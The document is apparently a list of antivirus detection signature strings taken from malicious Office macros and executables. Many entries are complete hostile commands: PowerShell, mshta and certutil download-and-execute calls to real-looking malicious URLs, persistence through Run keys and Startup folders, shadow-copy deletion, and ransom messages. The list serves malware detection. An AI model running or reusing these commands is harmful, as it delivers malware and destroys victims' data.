- exec( (MACROHSTR_EXT)
- Environ("tmp") & "\ (MACROHSTR_EXT)
- .jpg" (MACROHSTR_EXT)
- c:\programdata\ (MACROHSTR_EXT)
- .exec ( (MACROHSTR_EXT)
- CreateObject("wscript.shell") (MACROHSTR_EXT)
- As String = "c:\programdata\ (MACROHSTR_EXT)
- .pdf") (MACROHSTR_EXT)
- CreateObject("WinHttp.WinHttpRequest.5.1") (MACROHSTR_EXT)
- .exec (MACROHSTR_EXT)
- 32 test.pdf (MACROHSTR_EXT)
- r32 c:\programdata\ (MACROHSTR_EXT)
- .pdf" (MACROHSTR_EXT)
- .txt" (MACROHSTR_EXT)
- r32 c:\users\public\ (MACROHSTR_EXT)
- As String = "c:\users\public\ (MACROHSTR_EXT)
- .exec( (MACROHSTR_EXT)
- CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
- = VBA.Environ("AppData") & "\Microsoft\Excel\ (MACROHSTR_EXT)
- = "update.txt (MACROHSTR_EXT)
- .SaveToFile (MACROHSTR_EXT)
- .CreateObject("WScript.Shell").Run ("cscript //E:jscript " & (MACROHSTR_EXT)
- = ActiveDocument.AttachedTemplate.Path & "\12345" & ".dota:of (MACROHSTR_EXT)
- = Mid("Are Descript?", 7, 6) (MACROHSTR_EXT)
- Put #SIMol, , ActiveDocument.Content.Text (MACROHSTR_EXT)
- Pa.+>! (SNID)
- .CreateTextFile(Environ("temp") & "\ (MACROHSTR_EXT)
- .xs" & (MACROHSTR_EXT)
- .text) (MACROHSTR_EXT)
- .Close (MACROHSTR_EXT)
- Debug.Print Error( (MACROHSTR_EXT)
- "Wscript.Shell" (MACROHSTR_EXT)
- start mshta vbscript:createobject("wscript.shell").run("""C:\kl\ccc.cmd"" h",0)(window.close)&&exit (PEHSTR_EXT)
- START http://www. (PEHSTR_EXT)
- c:\kl\ccc.cmd (PEHSTR_EXT)
- C:\kl\ddd.cmd (PEHSTR_EXT)
- cmd.exe /c copy (PEHSTR_EXT)
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- = Application.StartupPath & "\" & "margee" & ":" & Application.Version (MACROHSTR_EXT)
- "The most thrue get application in test shell and some process a fear or script test it and power with execute ." (MACROHSTR_EXT)
- , " ")(14) & """ -Argum" & "entList @('/e:J" (MACROHSTR_EXT)
- , " ")(14) & "','\""" & StatusBar2 & """')", Empty, Empty, 0 (MACROHSTR_EXT)
- MsgBox "Failed to combine all PDFs", vbCritical, "Failed to Merge PDFs" (MACROHSTR_EXT)
- Couldn't find csgo.exe! (PEHSTR_EXT)
- justGlow.pdb (PEHSTR_EXT)
- Exploits\Exploit-API\Release\exploit-main.pdb (PEHSTR_EXT)
- Roblox/exploit crashed. (PEHSTR_EXT)
- script=Instance.new("LocalScript") (PEHSTR_EXT)
- = CreateObject("wscript.shell") (MACROHSTR_EXT)
- WinHttpReq.Open "GET", "http:// (MACROHSTR_EXT)
- .jpg", False (MACROHSTR_EXT)
- .exe", False (MACROHSTR_EXT)
- .Write WinHttpReq.ResponseBody (MACROHSTR_EXT)
- .SaveToFile (Environ("appdata") + "\ (MACROHSTR_EXT)
- 2.exe"), (MACROHSTR_EXT)
- .SaveToFile (Environ("TMP") + " (MACROHSTR_EXT)
- .Open Environ (MACROHSTR_EXT)
- .Create( (MACROHSTR_EXT)
- Debug.Print (MACROHSTR_EXT)
- https://www.facebook.com/ (PEHSTR)
- #<script>bigPipe.beforePageletArrive (PEHSTR)
- .SaveToFile ("C:\users\public\wf.dat") (MACROHSTR_EXT)
- .Open "GET", "http:// (MACROHSTR_EXT)
- longlive.casa/p1cture3.jpg (MACROHSTR_EXT)
- .Run "" & (RequestArgument + "32 (MACROHSTR_EXT)
- Application.Run "Gtys" (MACROHSTR_EXT)
- = CreateObject("W" + "Sc" + "ri" + "pt" + "" + "." + "Sh" + "el" + "" + "l") (MACROHSTR_EXT)
- Pl" + "" + "ay" + "" + "Li" + "st" + "" + "." + "v" + "" + "bs (MACROHSTR_EXT)
- .Run("ws" + "" + "cr" + "ip" + "" + "t" + "." + "" + "ex" + "e (MACROHSTR_EXT)
- = CallByName(CreateObject("W" & "Scri" & RexCold2("piti.Sihelli")), RexCold2("Ruin"), 1, RikP0, 1) (MACROHSTR_EXT)
- Application.StartupPath & RexCold("xxx\xx.x.x\.x.xx\x") & RexCold("jxSnOfdd.tovco.") (MACROHSTR_EXT)
- pyvjHfGNT = pyvjHfGNT + 0.05046294199 * Sgn(4.4778548954 + 52175.8062831484 * OaXvbJJ9I7n) (MACROHSTR_EXT)
- linewhriter.WriteLine ("wscript //nologo c:\winlogs\debug.vbs http://ozcamlibel.com.tr/wp-content/uploads/2019/10/oklcnms.tiff c:\winlogs\oly_debug2.exe") (MACROHSTR_EXT)
- VBA.CallByName VBA.CreateObject(Empty + "W" + Empty + "Sc" & Empty & "rip" & "t." & (MACROHSTR_EXT)
- = Fer & Empty & "\ (MACROHSTR_EXT)
- & Empty & "\ (MACROHSTR_EXT)
- ." & Empty & "c" & Empty & "m" & Empty & "d" (MACROHSTR_EXT)
- Olerr Application.StartupPath (MACROHSTR_EXT)
- = "1Normal.ThisDocument" (MACROHSTR_EXT)
- = Environ("temp") & "\~$My_CV~" & "." & "ex" & "e" (MACROHSTR_EXT)
- Set wshShell = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- wshShell.Run fp (MACROHSTR_EXT)
- DM.createElement("tmp") (MACROHSTR_EXT)
- DataType = "bin.base64" (MACROHSTR_EXT)
- CreateObject("wscript.shell").Run (MACROHSTR_EXT)
- ChrW(CLng(((1.55555555555556 * (846 - 765#) (MACROHSTR_EXT)
- -679 + 679.077497665733 (MACROHSTR_EXT)
- ).SpawnInstance (MACROHSTR_EXT)
- CreateObject("WScript.Shell").RegWrite (MACROHSTR_EXT)
- \Microsoft\Windows\Start Menu\Programs\Startup\""+" + " (MACROHSTR_EXT)
- " + "+"".exe" (MACROHSTR_EXT)
- .CreateTextFile( (MACROHSTR_EXT)
- P\Microsoft\Windows\Start Menu\Programs\Startup\templates.vbs", True, True) (MACROHSTR_EXT)
- RtCoolMom = RtCoolMom + 0.00000000105 * Sgn(1.88137155058 + 172402.036444808 * Assitents) (MACROHSTR_EXT)
- WriteLine ("wscript //nologo c:\Colorfonts32\visitcard.vbs https://www.kbtseafood.com/wp-content/uploads/2019/07/JTGUJRDPX.res c:\Colorfonts32\pes19.exe") (MACROHSTR_EXT)
- https://sx-facemask.com/wp-content/themes/busify/_Eb-6XZQPkeWFE2F0.php?x=MDAwMSCXfM02CmgQnk-DMmwZ6iqPCFHtzoeaRLfZrzLpiPzvIOSihDhzp9ISW4bpG92mmNuiHQNMEkLVrUmEz6koYzX70xVMGf6jVCqQeRVe7t85UJ6Q_r7oGwyZGzHnKZK1O-jzvCDYaZSg3VuYDRvD (MACROHSTR_EXT)
- = "wscript.shell (MACROHSTR_EXT)
- .Run$ payload (MACROHSTR_EXT)
- pyvjHfGNT = pyvjHfGNT + 0.40989414976 * Sgn(1.48302034194 + 26087.9031415742 * OaXvbJJ9I7n) (MACROHSTR_EXT)
- ("wscript //nologo c:\winlogs\debug.vbs https://angel.ac.nz/wp-content/uploads/2019/10/THEBRKMZ.ocx c:\winlogs\oly_debug2.exe") (MACROHSTR_EXT)
- echo wscript.sleep 3000 (MACROHSTR_EXT)
- wscript.createobject("wscript.shell").run (MACROHSTR_EXT)
- h""tt""p"":/""/newscambodia.serveblog.net/blog/%ComputerName%.doc (MACROHSTR_EXT)
- C:\ProgramData\GET\g.vbs (MACROHSTR_EXT)
- Q = Q + 0.40989414976 * Log(1.48302034194 + 26087.9031415742 * T) (MACROHSTR_EXT)
- SettingAttr.WriteLine ("start c:\Resources\REDclif.exe") (MACROHSTR_EXT)
- .CreateTextFile("c:\Resources\ (MACROHSTR_EXT)
- .cmd", True) (MACROHSTR_EXT)
- .WriteLine ("wscript //nologo c:\Colorfonts32\visitcard.vbs http (MACROHSTR_EXT)
- ://www. (MACROHSTR_EXT)
- .com/ (MACROHSTR_EXT)
- p.bin c:\Colorfonts32\ (MACROHSTR_EXT)
- .exe") (MACROHSTR_EXT)
- c:\programdata\rtyusdj.bat (MACROHSTR_EXT)
- c:\programdata\uylcsekn.bat (MACROHSTR_EXT)
- mshta http://91.240.118.168/qqqw/aaas/se.html (MACROHSTR_EXT)
- mshta http://91.240.118.172/ (MACROHSTR_EXT)
- (a-z)/ (MACROHSTR_EXT)
- (a-z).html (MACROHSTR_EXT)
- .Create(Null & (MACROHSTR_EXT)
- .ControlTipText (MACROHSTR_EXT)
- .Text = "cwgjamd /wgjac swgjatarwgjat/wgjaB (MACROHSTR_EXT)
- 5.TextBox (MACROHSTR_EXT)
- .Text, "wgja", "") (MACROHSTR_EXT)
- 5.Tag For Output As #1 (MACROHSTR_EXT)
- 5.ComboBox1.Tag (MACROHSTR_EXT)
- = Replace(vbir7uegfwi7egfs8udgfkjegbtk.TextBox4.Text, "wgja", "") (MACROHSTR_EXT)
- Text = "cwgjamd /wgjac swgjatarwgjat/wgjaB (MACROHSTR_EXT)
- .Tag = Left(dbhskdhv.Cell(2, 1), Len(dbhskdhv.Cell(2, 1)) (MACROHSTR_EXT)
- Open "c:\programdata\1.cmd" For Append As #1 (MACROHSTR_EXT)
- WinExec "c:\programdata\1.cmd", 0 (MACROHSTR_EXT)
- Print #1, frmpage.Label1.Caption (MACROHSTR_EXT)
- jiugiy = "c" + hfk2wjekj & ":\pro" + hfk2wjekj (MACROHSTR_EXT)
- = Environ("ALLUSERSPROFILE") & "\" & Rnd & ".js" (MACROHSTR_EXT)
- .Create("wscript.exe " & p, Null, Null, intProcessID) (MACROHSTR_EXT)
- Set objWMIService = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") (MACROHSTR_EXT)
- Call bc650879.exec(a779b2a8) (MACROHSTR_EXT)
- c:\programdata\preview.jpeg (MACROHSTR_EXT)
- db199cea.Open "GET", c4577dcf (MACROHSTR_EXT)
- .Item().Document.Application.ShellExecute (MACROHSTR_EXT)
- Set aw = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- aw.Run total (MACROHSTR_EXT)
- \vbsedit_source\script2exe\ (PEHSTR_EXT)
- \mywscript.pdb (PEHSTR_EXT)
- HTTPDownload (MACROHSTR_EXT)
- WScript.CreateObject( (MACROHSTR_EXT)
- WshShell.Run (MACROHSTR_EXT)
- wscript (MACROHSTR_EXT)
- .vbs (MACROHSTR_EXT)
- ("wscript //nologo c:\Colorfonts32\visitcard.vbs (MACROHSTR_EXT)
- @ c:\Colorfonts32\secpi15.exe (MACROHSTR_EXT)
- start c:\Colorfonts32\secpi15.exe (MACROHSTR_EXT)
- LoadScriptVBS GetObject(HashTable()), "c:\Colorfonts32\B4D9D02119.cmd", 0 (MACROHSTR_EXT)
- DownLoadString('http://t.amy'+'nx.com/7p.php?0.8*usb_lnk*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.amy'+'nx.co (PEHSTR)
- Pmshta vbscript:createobject("wscript.shell").run("cmd /c powershell -w hidden IE (PEHSTR)
- Set ages = CreateObject("Shell.Application") (MACROHSTR_EXT)
- ages.ShellExecute (kola) (MACROHSTR_EXT)
- name = "\\" & name & ".jse (MACROHSTR_EXT)
- Set objNetwork = CreateObject("WScript.Network") (MACROHSTR_EXT)
- = "do shell script " & Chr$(34) & "open -a Safari " & URL & Chr$(34) (MACROHSTR_EXT)
- = ShellExecute(0, "Open", URL) (MACROHSTR_EXT)
- = "do shell script " & Chr$(34) & "/usr/bin/curl --url " & URL & Chr$(34) (MACROHSTR_EXT)
- = ShellExecute(0, vbNullString, "net", "use (MACROHSTR_EXT)
- " & URL, "%windir%\system32", vbHide) (MACROHSTR_EXT)
- das = Replace("SystemComponentModelTypeDescriptorTypeDescriptorInterfaceshttp://7de3.shandow.ru/Drumheads.exeSystemComponentModelTypeDescriptorTypeDescriptorInterfaces", "SystemComponentModelTypeDescriptorTypeDescriptorInterfaces", "") (MACROHSTR_EXT)
- sas = Replace("mNetChunkParserReadStateqSystemComponentModelDesignStandardCommandsVSStandardCommandsE.emNetChunkParserReadStateqxe", "mNetChunkParserReadStateq", "") (MACROHSTR_EXT)
- CmdLine = """" & Filename & """" (MACROHSTR_EXT)
- CreateFileW(StrPtr("C:\FMKSJEU\ (MACROHSTR_EXT)
- .BAT") (MACROHSTR_EXT)
- wscript C:\FMKSJEU\ (MACROHSTR_EXT)
- .JSE" (MACROHSTR_EXT)
- Set docNew = Documents.Add(strTemplateName) (MACROHSTR_EXT)
- docNew.Activate (MACROHSTR_EXT)
- Jp/x) (SNID)
- invoice = CreateObject("scripting.filesystemobject") (MACROHSTR_EXT)
- a-z0-9.js" (MACROHSTR_EXT)
- strlink = "https:// (MACROHSTR_EXT)
- .php" (MACROHSTR_EXT)
- Set objhttpinvoice = CreateObject("msxml2.xmlhttp") (MACROHSTR_EXT)
- objhttpinvoice.Open "get", strlink, False (MACROHSTR_EXT)
- H:\flow\reproductivity\act\scripts.pdb (PEHSTR_EXT)
- "c:\netstats\" & "PressTableList" & ".jse" (MACROHSTR_EXT)
- "c:\netstats\" & "PressTableList" & ".cmd" (MACROHSTR_EXT)
- "cscript //nologo " + Filename (MACROHSTR_EXT)
- strParh = "c:\netstats" (MACROHSTR_EXT)
- KARTIC = "://www.bitly.com/" (MACROHSTR_EXT)
- z = "http://4GP.ME/bltc/1590074596521.txt" (MACROHSTR_EXT)
- = WinExec("cmd.exe /c mshta " & z, 0) (MACROHSTR_EXT)
- = " http://1230948%1230948@j.mp/ (MACROHSTR_EXT)
- : Shell ("ping.exe") (MACROHSTR_EXT)
- = " https://1230948%1230948@bitly.com/awkdhikhasd" (MACROHSTR_EXT)
- = ggg + lululu + tititi + "ta http://%20%20@j.mp/ (MACROHSTR_EXT)
- meinkonhun.EXEC pings (MACROHSTR_EXT)
- = " H" + D + D + L + "://" + K + T (MACROHSTR_EXT)
- = "/%911%911%911%911%911@j.mp\kasdasjxiaksddkadsdskdd" (MACROHSTR_EXT)
- Debug.Print (VBA.Shell(VPhpgRQZY + Ow2IUVEOa + wwhRKB94OflBEHVhu + OflBEHVhu)) (MACROHSTR_EXT)
- = "j" + "." + "m" + "p/" (MACROHSTR_EXT)
- : meinkonhun.EXEC pings (MACROHSTR_EXT)
- Yahoodi.STARTON (MACROHSTR_EXT)
- VBA.Shell(KCKR0hJiP + iJlPvslnp + smY1Dcdfl + XgdlIhOWY)) (MACROHSTR_EXT)
- = " http://%8234%8234@j.mp/ddkslasdjalsjdasnw" (MACROHSTR_EXT)
- = " http://1230948%1230948@j.mp/wasajsidjasdasdkoocs" (MACROHSTR_EXT)
- = "e http://achoteis.com.br/images/atendimento.txt" (MACROHSTR_EXT)
- = StrReverse(SReverseMod("p/.m@j480923%1480923/1:/tpht ") (MACROHSTR_EXT)
- Shell StrReverse(SReverseMod("tash m/cd cm")) (MACROHSTR_EXT)
- SquirrelFishChromescript (PEHSTR_EXT)
- /c ec^h^o CreateObject("Wscript.Shell").Run "cmd (PEHSTR_EXT)
- /c cmd /c cmd /c powershell -ep bypass -f (PEHSTR_EXT)
- \server (PEHSTR_EXT)
- .ps1 (PEHSTR_EXT)
- , 0, False > %appdata%\ (PEHSTR_EXT)
- .vb^s& wscript %appdata%\ (PEHSTR_EXT)
- .vb^s& del %appdata%\ (PEHSTR_EXT)
- .vb^s (PEHSTR_EXT)
- ttps://cutt.ly/8jmDPVb (MACROHSTR_EXT)
- ttps://cutt.ly/fjYtydH (MACROHSTR_EXT)
- = ActiveCell.Offset(iC, 1).Value (MACROHSTR_EXT)
- Call yGGsvaB.pkutdFZ (MACROHSTR_EXT)
- URLDownloadToFile 0, ImagemSimplesCDT, MasterCDT & "document.vbs", 0, 0 (MACROHSTR_EXT)
- hzunLrU.Run IpRAhYeJ + nYJEZJtb + yKijjyI, RValue (MACROHSTR_EXT)
- = ActiveDocument.BuiltInDocumentProperties("Comments") (MACROHSTR_EXT)
- Set hzunLrU = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- Shell ("C:\\Windows\\System32\\cmd.exe /c echo (MACROHSTR_EXT)
- (wget 'https://tinyurl.com/y88r9epk' -OutFile a.exe) > b.ps1 (MACROHSTR_EXT)
- powershell -ExecutionPolicy ByPass -File b.ps1 (MACROHSTR_EXT)
- START /MIN a.exe (MACROHSTR_EXT)
- tilpS.srahCiics (MACROHSTR_EXT)
- powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle hidden (MACROHSTR_EXT)
- Encodedcommand cABvAHcAZQByAHMAaABlAGwAbAAuAGUAe (MACROHSTR_EXT)
- = MsgBox("WE HAVE ALL YOUR DATA- YOU WANT PAY?-0.2bitcoin-78fcWL7M8A7woRBdnPurezEsW1o63RVYUS", vbYesNo) (MACROHSTR_EXT)
- = "https://long.af/FactDownParty" (MACROHSTR_EXT)
- %HOMEDRIVE%\%HOMEPATH%\Documents\easrtagyhdjkdgatareraty.ps1""", 0) (MACROHSTR_EXT)
- strCombined = str1 & str2 & str3 & str4 & str5 & str6 & str7 (MACROHSTR_EXT)
- strCommand = "powershell.exe -noexit -encodedcommand " & strCombined (MACROHSTR_EXT)
- c:\They\by\Say\Drive\650-Break\Product.pdb (PEHSTR_EXT)
- ShellExecute (MACROHSTR_EXT)
- https://dangerously. (MACROHSTR_EXT)
- svc.dll (MACROHSTR_EXT)
- http://grars.com/ (MACROHSTR_EXT)
- .exe (MACROHSTR_EXT)
- http://tamboe.net/ (MACROHSTR_EXT)
- http://retoh.com/ (MACROHSTR_EXT)
- http://kwatov.com/ (MACROHSTR_EXT)
- .OLEObjects("Object (MACROHSTR_EXT)
- ").Copy (MACROHSTR_EXT)
- MkDir "C:" + "\KB4" + " (MACROHSTR_EXT)
- Shell.Run "SchTasks /Create /SC (MACROHSTR_EXT)
- CopyFile Environ("Temp") & "\KB4" + (MACROHSTR_EXT)
- http://fourstars.cyou/1.php (MACROHSTR_EXT)
- \91919.dll (MACROHSTR_EXT)
- C:\ProgramData\rmbvmdq.exe (MACROHSTR_EXT)
- ShellExecuteA (MACROHSTR_EXT)
- = Replace("https://staging.gaiafacturacion.com/produccion/v4/include/lib/phpqrcode/cache/rzkNuqp6m1hoY.php (MACROHSTR_EXT)
- = Replace("Wscript.Shell (MACROHSTR_EXT)
- Set qDwIfDBqY = lcCrJ.OpenTextFile(OTDZ + "\nRSdr.vbs", 8, True) (MACROHSTR_EXT)
- Piqp.ShellExecute "P" + Cells(7, 1), fjdfk(A2), "", "", 0 (MACROHSTR_EXT)
- Open bay4egtkajsyugi.Sjs5reSdrtyd("egasw", "tyer", 76) For Output As #1 (MACROHSTR_EXT)
- .CreateObject(Sjs5reSdrtyd("dfeWEtarasd", "dsfswetrTErtwerRe", 82), "").Run (MACROHSTR_EXT)
- https://cortinastelasytrazos.com/Yro6Atvj/sec.html (MACROHSTR_EXT)
- https://orquideavallenata.com/4jmDb0s9sg/sec.html (MACROHSTR_EXT)
- https://fundacionverdaderosheroes.com/gY0Op5Jkht/sec.html (MACROHSTR_EXT)
- .Pattern = "j|q|U|v|M|O|X|z|D|H|Z|V|P|Q|Y|I|N|w|K|L" (MACROHSTR_EXT)
- .Global = True (MACROHSTR_EXT)
- YYImycMg = Vd1AUR2eW.Replace(B2XkKkUph(0), "") (MACROHSTR_EXT)
- http://sportbettingdubuque.com/512.dll (MACROHSTR_EXT)
- C:\LtsgStQ\cqYpbgG (MACROHSTR_EXT)
- .Formula = tg_Tan(c, Kio, Sma) (MACROHSTR_EXT)
- .Formula = "=" & "R" & "E" & NJ & "RN(" & ") (MACROHSTR_EXT)
- http://tinyurl.com/y3ox6t9t (MACROHSTR_EXT)
- MSHTA https://jornaldacidade.store/ (MACROHSTR_EXT)
- ttps://tinyurl.com/y76d4wag (MACROHSTR_EXT)
- (nEw-oB`jecT Net.WebcL`IENt) (MACROHSTR_EXT)
- ttps://tinyurl.com/yapf7lfr (MACROHSTR_EXT)
- /c po^wersh (MACROHSTR_EXT)
- ttp://hotelcontinental-khenifra.com/admin/gyt091236.exe (MACROHSTR_EXT)
- = "tps://www.diamantesviagens.com.br/terca. (MACROHSTR_EXT)
- ttp://rebrand.ly/WdBPApoMACRO','a.bat') (MACROHSTR_EXT)
- ttp://tinyurl.com/y5onncnm (MACROHSTR_EXT)
- https://www" + ".b" + "i" + "t" + "l" + "y" + "." + "c" + "o" + "m" + "/" + "dhgjksahdsa" + "twieqbdhss (MACROHSTR_EXT)
- http://%8234%8234@j.mp/ddkjaspoqwiokaslkdkw (MACROHSTR_EXT)
- powershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://rota-r.ru/wp-admin/css/d') (MACROHSTR_EXT)
- tp:// (MACROHSTR_EXT)
- (0-9)@j.mp/" (MACROHSTR_EXT)
- tp://1230912489%1230192309@j.mp/ (MACROHSTR_EXT)
- = "tps://www.rivieradesaolou.com.br/ (MACROHSTR_EXT)
- = "tps://www.diamantesviagens.com.br/ (MACROHSTR_EXT)
- com = "https://pastebin.com/raw/qmgVia1Z (MACROHSTR_EXT)
- Resultado = WinExec("cmd.exe /c mshta.exe " & com, 0) (MACROHSTR_EXT)
- kbdgr.dll (PEHSTR_EXT)
- KbdLayerDescriptor (PEHSTR_EXT)
- =createobject("wscript.shell")var21=var31.specialfolders("appdata")var21=var21+"\hihi.ps1 (MACROHSTR_EXT)
- winhttpreq.open"get",link,falsewinhttpreq.sendfilecontent (MACROHSTR_EXT)
- =1ostream.writefilecontentostream.savetofilevar21 (MACROHSTR_EXT)
- https://gist.githubusercontent.com/hoanga2dtk68/3fe20a1a21df992fa462142b17f3cee0/raw/af052a13970ad1557f0e1225e82f4aa6619c047f/hihi.ps1 (MACROHSTR_EXT)
- = myRange.Count (MACROHSTR_EXT)
- = "C:\Users\Public\textfile.wsf" (MACROHSTR_EXT)
- = "wscript " + myFile (MACROHSTR_EXT)
- gpj.1cn3rm329_p/ten.pot4pot.a//:sptth (MACROHSTR_EXT)
- exe. (MACROHSTR_EXT)
- \ataDmargorP\:C (MACROHSTR_EXT)
- asjklad87321asjhdha\pm" & "." & "j\\:s" & "ptth" (MACROHSTR_EXT)
- .exe ""C:\ (MACROHSTR_EXT)
- ).Run((and_caprice_and & (MACROHSTR_EXT)
- as_to_influence = ".txt" (MACROHSTR_EXT)
- leave_her_uncle = "wscript.shel" & (MACROHSTR_EXT)
- Wscript.Quit = ("" & CreateObject(((leave_her_uncle))).Run (MACROHSTR_EXT)
- Replace("zh.setadpu/2zh/ur.ABVlecxE//:ptth", (MACROHSTR_EXT)
- URL$ = "http://excelvba.ru/updates/download.php?addin=Parser (MACROHSTR_EXT)
- .CreateTextFile("C:\ProgramData\LKOJHFTDTYFVKDSFFV", True) (MACROHSTR_EXT)
- .Exec "explorer.exe " & Re.Jo.Tag (MACROHSTR_EXT)
- = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
- FHDyhnsfxguhxfnhg.WriteLine ("Verery") (MACROHSTR_EXT)
- Set FHDyhnsfxguhxfnhg = Ret.CreateTextFile(Re.Jo.Tag, True) (MACROHSTR_EXT)
- Set xmlhttp = CreateObject("Microsoft.XMLHTTP") (MACROHSTR_EXT)
- = ActiveDocument.CustomDocumentProperties("ipadr").Value (MACROHSTR_EXT)
- = pvGetFile("http://" + (MACROHSTR_EXT)
- + "/easydore/document/champsFusion.html?nocache=" & Now) (MACROHSTR_EXT)
- Call displayError("UTF8_Decode", Err.Number, Err.Description) (MACROHSTR_EXT)
- \blowfish.dll (PEHSTR_EXT)
- o CreateObject("Wscript.Shell").Run "cmd (PEHSTR_EXT)
- s& wscript %appdata%\ (PEHSTR_EXT)
- s& del %appdata%\ (PEHSTR_EXT)
- ypass -f C:\TEMP\cve (PEHSTR_EXT)
- C:\TEMP\ (PEHSTR_EXT)
- .tmp\blowfish.dll (PEHSTR_EXT)
- Av4gsiPl_3.glvg3XItpsALCu87_gp2K8AHee5im (MACROHSTR_EXT)
- pL_EHxmWz_VCD_DwXWo.Lg_O_qfOKeZhaGhFJGfQlHtB5 (MACROHSTR_EXT)
- .Run( (MACROHSTR_EXT)
- .Run(IBSY_al4mysdD1rMJJL8u_GXee_KjngNMZr (MACROHSTR_EXT)
- zuQkQxuNb5D_RW.oiKpJXHGAtdZYRhWn55D (MACROHSTR_EXT)
- Coys_i.uNP_f_k_ugdJb_k9FHkj (MACROHSTR_EXT)
- .Run(mrD_R_aLueF4, vBZ___jU4KPUTw) (MACROHSTR_EXT)
- E5EN_.SodUux_REp__Z_ARCqyP (MACROHSTR_EXT)
- .Run(OynIwt4NYsXQHU, fu7UhGaUpAhRarZEI) (MACROHSTR_EXT)
- .Run(idimqszsifynt, rtccibnugxqvtcwtilrbgqhcwke) (MACROHSTR_EXT)
- U__27jWt2.y_OqwD9Oaak_TKKAJwhk (MACROHSTR_EXT)
- .Run(LWVoZiBZ_N_, H3leXgsyKY_EyTmc) (MACROHSTR_EXT)
- WbQZrn8I4K_Z53_JUxSMOuOp38z9_.jtsg9vP_6j7DIoJnHmEiH4PaM (MACROHSTR_EXT)
- m7K_ZdKWYwDhiaMS_h4_D8Ym_99.W46_mWegKSVz_wu_F2oVTUjIUKEQE (MACROHSTR_EXT)
- = opopo + mksmdas + jdsakdaw + "ta http://%20%20@j.mp/ (MACROHSTR_EXT)
- = feixbto + so1 + ho2 + "ta http://%20%20@j.mp/sdhja67xzhjdas" (MACROHSTR_EXT)
- ysbjIBITlH8SKLbIB_K.AgPY5FeQh_eDuy65uvTuEd (MACROHSTR_EXT)
- = "Wscript.Shell" (MACROHSTR_EXT)
- LeXmaPeaK.ot9_YlQ_Nw7lVBupf_PT (MACROHSTR_EXT)
- .Run(Dgi9_BcugUYt6_, GJW7Z_SBr1_WxgJAY3cUE) (MACROHSTR_EXT)
- localscript (PEHSTR_EXT)
- CreateObject("Wscript.shell").exec@( (MACROHSTR_EXT)
- ((WScript.Echo() (MACROHSTR_EXT)
- A1:IV5000].SpecialCells(xlConstants) (MACROHSTR_EXT)
- description.Text (PEHSTR_EXT)
- vssadmin delete shadows /all /quiet (PEHSTR_EXT)
- modify, rename, delete or change the encrypted (.dsec) files (PEHSTR_EXT)
- Your photos, music, documents, work files, etc. are now encoded and unreadable. (PEHSTR_EXT)
- + "objShell.Run Base64Decode(" (MACROHSTR_EXT)
- = "C:\Windows\System32\w" + "script" + ".exe " (MACROHSTR_EXT)
- "WScript." + "She" + "ll" (MACROHSTR_EXT)
- + "." + "v" (MACROHSTR_EXT)
- GetDllName = "C:\ProgramData\desktop.dat" (MACROHSTR_EXT)
- .CreateElement("base64") (MACROHSTR_EXT)
- ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
- , ".") - 1) (MACROHSTR_EXT)
- CreateObject("Word.Application") (MACROHSTR_EXT)
- http://fav1.ru/far.msi (MACROHSTR_EXT)
- http://fer1.ru/ff.msi (MACROHSTR_EXT)
- http://tov1.ru/toy.msi (MACROHSTR_EXT)
- http://ejv1.ru/123.msi (MACROHSTR_EXT)
- http://ffgh.ru/jj.msi (MACROHSTR_EXT)
- CreateObject("Wscript.Shell").Run Str (MACROHSTR_EXT)
- objShell = CreateObject("Wscript.shell") (MACROHSTR_EXT)
- objShell.Run ("powershell.exe -w hidden -nop -ep bypass -c (MACROHSTR_EXT)
- nslookup -q=txt l.ns.ostrykebs.pl. (MACROHSTR_EXT)
- match '@(.*)@'){IEX $matches[1] (MACROHSTR_EXT)
- = "tps://www.diamantesviagens.com.br/rei2. (MACROHSTR_EXT)
- arraymain(i).date_borrowed = "https://www. (MACROHSTR_EXT)
- arraymain(i).date_due = "bitly.com/asdhasdookdkwdiahsidh (MACROHSTR_EXT)
- com1 = "ech" + "o start" & " ca" (MACROHSTR_EXT)
- com2 = "lc >> %temp%\2.txt" (MACROHSTR_EXT)
- com3 = com1 + com2 (MACROHSTR_EXT)
- Set objshell = CreateObject("wscript.shell") (MACROHSTR_EXT)
- 192.168.49.79/DEBUG_DOWNLOAD test.txt", vbHide) (MACROHSTR_EXT)
- = Shell("certutil.exe -urlcache -split -f http:// (MACROHSTR_EXT)
- Application.Run " (MACROHSTR_EXT)
- = CreateObject("WScript.Shell") (MACROHSTR_EXT)
- .Run (MACROHSTR_EXT)
- = CreateObject("Msxml2.DOMDocument.3.0") (MACROHSTR_EXT)
- .dataType = "bin.base64" (MACROHSTR_EXT)
- \h1.xsl" (MACROHSTR_EXT)
- \h1.com" (MACROHSTR_EXT)
- frm.textbox2.text (MACROHSTR_EXT)
- .exec aqTf5d (MACROHSTR_EXT)
- ("comments") & agHu8 (MACROHSTR_EXT)
- Application.Eval ( (MACROHSTR_EXT)
- .Run(Path + TXTFile, windowStyle, waitOnReturn)) (MACROHSTR_EXT)
- Path = "C:\" + (MACROHSTR_EXT)
- path + "System32\c" + "script" + ".ex" (MACROHSTR_EXT)
- = "Scri" (MACROHSTR_EXT)
- = "scr" + "ipt1" (MACROHSTR_EXT)
- + ".S" (MACROHSTR_EXT)
- = Replace("MSXMLKsq%p,2.XMLHTTP", "Ksq%p,", "") (MACROHSTR_EXT)
- = Replace("rungJIpg_XdgJIpg_Xll32.exg (MACROHSTR_EXT)
- MsgBox Msg, , "OK", Err.HelpFile, Err.HelpContext (MACROHSTR_EXT)
- .Create (MACROHSTR_EXT)
- / Xor (MACROHSTR_EXT)
- .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qDialogGalleryScatter.sct" & Chr(34)) (MACROHSTR_EXT)
- qAxis = qAxis & Chr(qIMEModeAlphaFull.Value) (MACROHSTR_EXT)
- With CreateObject("Wscript.Shell") (MACROHSTR_EXT)
